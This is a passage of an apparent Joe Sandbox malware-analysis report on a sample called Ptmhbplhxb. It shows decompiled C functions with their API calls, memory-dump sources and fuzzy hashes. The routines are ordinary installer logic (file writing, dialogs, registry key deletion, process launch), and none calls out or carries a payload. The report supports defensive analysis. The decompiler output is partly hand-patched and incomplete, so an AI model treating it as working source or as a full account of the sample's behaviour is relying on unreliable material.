                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00402736(int __ebx) {
                				void* _t26;
                				long _t31;
                				int _t45;
                				void* _t49;
                				void* _t51;
                				void* _t54;
                				void* _t55;
                				void* _t56;
                				CHAR* _t50; // declaration added: used below but missing from the decompiler output
                				CHAR* _t23; // declaration added: used below but missing from the decompiler output
                				intOrPtr _t47; // declaration added: used below but missing from the decompiler output
                				_t45 = __ebx;
                				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                				_t50 = E00402AC1(0xfffffff0);
                				 *(_t56 - 0x34) = _t23;
                				if(E0040596A(_t50) == 0) {
                					E00402AC1(0xffffffed);
                				}
                				E00405AD9(_t50);
                				_t26 = E00405AFE(_t50, 0x40000000, 2);
                				 *(_t56 + 8) = _t26;
                				if(_t26 != 0xffffffff) {
                					_t31 =  *0x42f418;
                					 *(_t56 - 0x30) = _t31;
                					_t49 = GlobalAlloc(0x40, _t31);
                					if(_t49 != _t45) {
                						E004031A9(_t45);
                						E00403193(_t49,  *(_t56 - 0x30));
                						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                						 *(_t56 - 0x3c) = _t54;
                						if(_t54 != _t45) {
                							E00402F81( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                							while( *_t54 != _t45) {
                								_t47 =  *_t54;
                								_t55 = _t54 + 8;
                								 *(_t56 - 0x84) =  *_t54;
                								E00405AB9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                								_t54 = _t55 +  *(_t56 - 0x84);
                							}
                							GlobalFree( *(_t56 - 0x3c));
                						}
                						E00405BA5( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                						GlobalFree(_t49);
                						 *((intOrPtr*)(_t56 - 0xc)) = E00402F81(0xffffffff,  *(_t56 + 8), _t45, _t45);
                					}
                					CloseHandle( *(_t56 + 8));
                				}
                				_t51 = 0xfffffff3;
                				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                					_t51 = 0xffffffef;
                					DeleteFileA( *(_t56 - 0x34));
                					 *((intOrPtr*)(_t56 - 4)) = 1;
                				}
                				_push(_t51);
                				E00401423();
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t56 - 4));
                				return 0;
                			}

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                • GlobalFree.KERNEL32 ref: 004027E5
                • GlobalFree.KERNEL32 ref: 004027F8
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Global$AllocFree$CloseDeleteFileHandle
                • String ID:
                • API String ID: 2667972263-0
                • Opcode ID: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                • Instruction ID: 6644526d81fa5c7ff175c86addd85cc92bc24fd3ec06af29a2511a4f4fc8a5d3
                • Opcode Fuzzy Hash: 0a6e144848f4cf5ec871b7427f26d1c5b8ffe33ee9db8fbfbd958a55083b1002
                • Instruction Fuzzy Hash: 3B21BC71800124BBDF216FA5DE89D9E7B79EF04324F10423AF924762E0CA784D418FA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00401D95(intOrPtr __edx) {
                				void* __esi;
                				int _t9;
                				signed char _t15;
                				struct HFONT__* _t18;
                				intOrPtr _t30;
                				struct HDC__* _t31;
                				void* _t33;
                				void* _t35;
                
                				_t30 = __edx;
                				_t31 = GetDC( *(_t35 - 8));
                				_t9 = E00402A9F(2);
                				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                				ReleaseDC( *(_t35 - 8), _t31);
                				 *0x40b830 = E00402A9F(3);
                				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
                				 *0x40b837 = 1;
                				 *0x40b834 = _t15 & 0x00000001;
                				 *0x40b835 = _t15 & 0x00000002;
                				 *0x40b836 = _t15 & 0x00000004;
                				E00405F87(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
                				_t18 = CreateFontIndirectA(0x40b820);
                				_push(_t18);
                				_push(_t33);
                				E00405EC3();
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
                				return 0;
                			}

                APIs
                • GetDC.USER32(?), ref: 00401D98
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                • ReleaseDC.USER32 ref: 00401DCB
                • CreateFontIndirectA.GDI32(0040B820), ref: 00401E1A
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirectRelease
                • String ID:
                • API String ID: 3808545654-0
                • Opcode ID: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                • Instruction ID: e9269c0f41cd5a79e17a17131fa0488204b4df503fc5c3e11bd14e9e74a55962
                • Opcode Fuzzy Hash: 308e053560ee70820e3614aee6e3ae82a2990e303a595f115dffdce8e5cbd147
                • Instruction Fuzzy Hash: 24014072944344AEE7006BB4AE49BA97FE8EB15705F109439F141B61F2CB790405CF6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401D3B(int __edx) {
                				void* _t17;
                				struct HINSTANCE__* _t21;
                				struct HWND__* _t25;
                				void* _t27;
                
                				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                				GetClientRect(_t25, _t27 - 0x48);
                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
                				if(_t17 != _t21) {
                					DeleteObject(_t17);
                				}
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
                				return 0;
                			}

                APIs
                • GetDlgItem.USER32 ref: 00401D3F
                • GetClientRect.USER32 ref: 00401D4C
                • LoadImageA.USER32 ref: 00401D6D
                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                • DeleteObject.GDI32(00000000), ref: 00401D8A
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E0040484D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                				char _v36;
                				char _v68;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t21;
                				signed int _t22;
                				signed int _t23; // declaration added: used below but missing from the decompiler output
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				void* _t41;
                				signed int _t43;
                				signed int _t47;
                				signed int _t50;
                				signed int _t51;
                				signed int _t53;
                
                				_t21 = _a16;
                				_t51 = _a12;
                				_t41 = 0xffffffdc;
                				if(_t21 == 0) {
                					_push(0x14);
                					_pop(0);
                					_t22 = _t51;
                					if(_t51 < 0x100000) {
                						_push(0xa);
                						_pop(0);
                						_t41 = 0xffffffdd;
                					}
                					if(_t51 < 0x400) {
                						_t41 = 0xffffffde;
                					}
                					if(_t51 < 0xffff3333) {
                						_t50 = 0x14;
                						asm("cdq");
                						_t22 = 1 / _t50 + _t51;
                					}
                					_t23 = _t22 & 0x00ffffff;
                					_t53 = _t22 >> 0;
                					_t43 = 0xa;
                					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                				} else {
                					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                					_t47 = 0;
                				}
                				_t29 = E00405F87(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                				_t31 = E00405F87(_t41, _t47, _t53,  &_v68, _t41);
                				_t32 = E00405F87(_t41, _t47, 0x42a870, 0x42a870, _a8);
                				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
                			}

                APIs
                • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                • wsprintfA.USER32 ref: 004048F3
                • SetDlgItemTextA.USER32 ref: 00404906
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                • Opcode Fuzzy Hash: fc360b60deb29158253d5225dc841659dab03716f0da90b14001ba2338fc6a71
                • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00401C04(intOrPtr __edx) {
                				int _t29;
                				long _t30;
                				signed int _t32;
                				CHAR* _t35;
                				CHAR* _t31; // declaration added: used below but missing from the decompiler output
                				CHAR* _t59; // declaration added: used below but missing from the decompiler output
                				long _t36;
                				int _t41;
                				signed int _t42;
                				int _t46;
                				int _t56;
                				intOrPtr _t57;
                				struct HWND__* _t61;
                				void* _t64;
                
                				_t57 = __edx;
                				_t29 = E00402A9F(3);
                				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                				 *(_t64 - 8) = _t29;
                				_t30 = E00402A9F(4);
                				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                				 *(_t64 + 8) = _t30;
                				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                					 *((intOrPtr*)(_t64 - 8)) = E00402AC1(0x33); // frame pointer is _t64 throughout this function; the decompiler emitted __ebp here
                				}
                				__eflags =  *(_t64 - 0x14) & 0x00000002;
                				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                					 *(_t64 + 8) = E00402AC1(0x44);
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t59 = E00402AC1();
                					_t32 = E00402AC1();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t35 =  ~( *_t31) & _t59;
                					__eflags = _t35;
                					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                					goto L10;
                				} else {
                					_t61 = E00402A9F();
                					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                					_t41 = E00402A9F(2);
                					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                					_t56 =  *(_t64 - 0x14) >> 2;
                					if(__eflags == 0) {
                						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                						L10:
                						 *(_t64 - 0xc) = _t36;
                					} else {
                						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                					_push( *(_t64 - 0xc));
                					E00405EC3();
                				}
                				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
                				return 0;
                			}

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
                • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004058FD(CHAR* _a4) {
                				CHAR* _t7;
                
                				_t7 = _a4;
                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                					lstrcatA(_t7, 0x40a014);
                				}
                				return _t7;
                			}

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004031DE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
                • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004031DE,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
                • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
                Strings
                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058FD
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user~1\AppData\Local\Temp\
                • API String ID: 2659869361-2382934351
                • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
                • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                				void* _v8;
                				char _v272;
                				void* _t19;
                				signed int _t26;
                				intOrPtr* _t28;
                				signed int _t33;
                				signed int _t34;
                				signed int _t35;
                
                				_t34 = _a12;
                				_t35 = _t34 & 0x00000300;
                				_t33 = _t34 & 0x00000001;
                				_t19 = E00405DEB(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
                				if(_t19 == 0) {
                					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                						__eflags = _t33;
                						if(__eflags != 0) {
                							RegCloseKey(_v8);
                							return 1;
                						}
                						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
                						__eflags = _t26;
                						if(_t26 != 0) {
                							break;
                						}
                					}
                					RegCloseKey(_v8);
                					_t28 = E004062FD(3);
                					if(_t28 == 0) {
                						return RegDeleteKeyA(_a4, _a8);
                					}
                					return  *_t28(_a4, _a8, _t35, 0);
                				}
                				return _t19;
                			}

                APIs
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                • RegCloseKey.ADVAPI32(?), ref: 00402C22
                • RegCloseKey.ADVAPI32(?), ref: 00402C43
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Close$Enum
                • String ID:
                • API String ID: 464197530-0
                • Opcode ID: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                • Opcode Fuzzy Hash: 24478c4bf15825225cc5c8a9b60ec975c192d416f9cfe0da761514a225b2f336
                • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405996(CHAR* _a4) {
                				CHAR* _t5;
                				char* _t7;
                				CHAR* _t9;
                				char _t10;
                				CHAR* _t11;
                				void* _t13;
                
                				_t11 = _a4;
                				_t9 = CharNextA(_t11);
                				_t5 = CharNextA(_t9);
                				_t10 =  *_t11;
                				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
                					if(_t10 != 0x5c || _t11[1] != _t10) {
                						L10:
                						return 0;
                					} else {
                						_t13 = 2;
                						while(1) {
                							_t13 = _t13 - 1;
                							_t7 = E00405928(_t5, 0x5c);
                							if( *_t7 == 0) {
                								goto L10;
                							}
                							_t5 = _t7 + 1;
                							if(_t13 != 0) {
                								continue;
                							}
                							return _t5;
                						}
                						goto L10;
                					}
                				} else {
                					return CharNextA(_t5);
                				}
                			}

                APIs
                • CharNextA.USER32(?,?,C:\,?,00405A02,C:\,C:\,772EFA90,?,C:\Users\user~1\AppData\Local\Temp\,0040574D,?,772EFA90,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004059A4
                • CharNextA.USER32(00000000), ref: 004059A9
                • CharNextA.USER32(00000000), ref: 004059BD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: CharNext
                • String ID: C:\
                • API String ID: 3213498283-3404278061
                • Opcode ID: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
                • Instruction ID: 692bca14cad493fa5f8fffeffcf9af39aa377604f3823295436d19c4138fc52d
                • Opcode Fuzzy Hash: 6f1ffd314258f60c9d8d37a97cd5dc7cb97b0114338afd6930da08174d9d3dc4
                • Instruction Fuzzy Hash: CDF0C2E1918F50ABFB3252245C41B6B5F9CCB56374F04047BE240672C2C27858408B9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402CE4(intOrPtr _a4) {
                				long _t2;
                				struct HWND__* _t3;
                				struct HWND__* _t6;
                
                				if(_a4 == 0) {
                					__eflags =  *0x421428; // 0x0
                					if(__eflags == 0) {
                						_t2 = GetTickCount();
                						__eflags = _t2 -  *0x42f410;
                						if(_t2 >  *0x42f410) {
                							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C61, 0);
                							 *0x421428 = _t3;
                							return ShowWindow(_t3, 5);
                						}
                						return _t2;
                					} else {
                						return E00406339(0);
                					}
                				} else {
                					_t6 =  *0x421428; // 0x0
                					if(_t6 != 0) {
                						_t6 = DestroyWindow(_t6);
                					}
                					 *0x421428 = 0;
                					return _t6;
                				}
                			}

                APIs
                • DestroyWindow.USER32(00000000,00000000,00402EC4,00000001), ref: 00402CF7
                • GetTickCount.KERNEL32 ref: 00402D15
                • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00405000(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                				int _t15;
                				long _t16;
                
                				_t15 = _a8;
                				if(_t15 != 0x102) {
                					if(_t15 != 0x200) {
                						_t16 = _a16;
                						L7:
                						if(_t15 == 0x419 &&  *0x42a85c != _t16) {
                							_push(_t16);
                							_push(6);
                							 *0x42a85c = _t16;
                							E004049D7();
                						}
                						L11:
                						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
                					}
                					if(IsWindowVisible(_a4) == 0) {
                						L10:
                						_t16 = _a16;
                						goto L11;
                					}
                					_t16 = E00404957(_a4, 1);
                					_t15 = 0x419;
                					goto L7;
                				}
                				if(_a12 != 0x20) {
                					goto L10;
                				}
                				E00404072(0x413);
                				return 0;
                			}

                APIs
                • IsWindowVisible.USER32 ref: 0040502F
                • CallWindowProcA.USER32 ref: 00405080
                  • Part of subcall function 00404072: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404084
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405604(CHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x42c078->cb = 0x44;
                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20);
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}

                APIs
                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
                • CloseHandle.KERNEL32(?), ref: 0040563A
                Strings
                • Error launching installer, xrefs: 00405617
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
